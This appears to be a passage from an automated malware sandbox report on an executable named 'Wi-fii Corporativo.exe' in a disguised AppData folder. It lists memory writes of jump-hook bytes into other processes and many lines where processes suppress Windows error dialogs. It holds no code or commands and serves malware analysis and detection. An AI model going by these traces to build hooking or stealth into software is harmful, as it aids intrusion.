Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 7732 base: 75E80230 value: E9 DA FD 1D 8B	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 8156 base: 1490005 value: E9 8B 2F A6 75	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 8156 base: 76EF2F90 value: E9 7A D0 59 8A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 8156 base: 14A0005 value: E9 2B BA A1 75	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 8156 base: 76EBBA30 value: E9 DA 45 5E 8A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 8156 base: 14B0008 value: E9 8B 8E A5 75	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 8156 base: 76F08E90 value: E9 80 71 5A 8A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 8156 base: 14F0005 value: E9 8B 4D 58 74	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 8156 base: 75A74D90 value: E9 7A B2 A7 8B	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 8156 base: 6720005 value: E9 EB EB 36 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 8156 base: 75A8EBF0 value: E9 1A 14 C9 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 8156 base: 6730005 value: E9 8B 8A 72 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 8156 base: 75E58A90 value: E9 7A 75 8D 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 8156 base: 6740005 value: E9 2B 02 74 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 8156 base: 75E80230 value: E9 DA FD 8B 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 5508 base: A70005 value: E9 8B 2F 48 76	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 5508 base: 76EF2F90 value: E9 7A D0 B7 89	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 5508 base: A80005 value: E9 2B BA 43 76	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 5508 base: 76EBBA30 value: E9 DA 45 BC 89	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 5508 base: A90008 value: E9 8B 8E 47 76	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 5508 base: 76F08E90 value: E9 80 71 B8 89	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 5508 base: AF0005 value: E9 8B 4D F8 74	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 5508 base: 75A74D90 value: E9 7A B2 07 8B	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 5508 base: B00005 value: E9 EB EB F8 74	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 5508 base: 75A8EBF0 value: E9 1A 14 07 8B	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 5508 base: B10005 value: E9 8B 8A 34 75	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 5508 base: 75E58A90 value: E9 7A 75 CB 8A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 5508 base: B20005 value: E9 2B 02 36 75	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Memory written: PID: 5508 base: 75E80230 value: E9 DA FD C9 8A	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
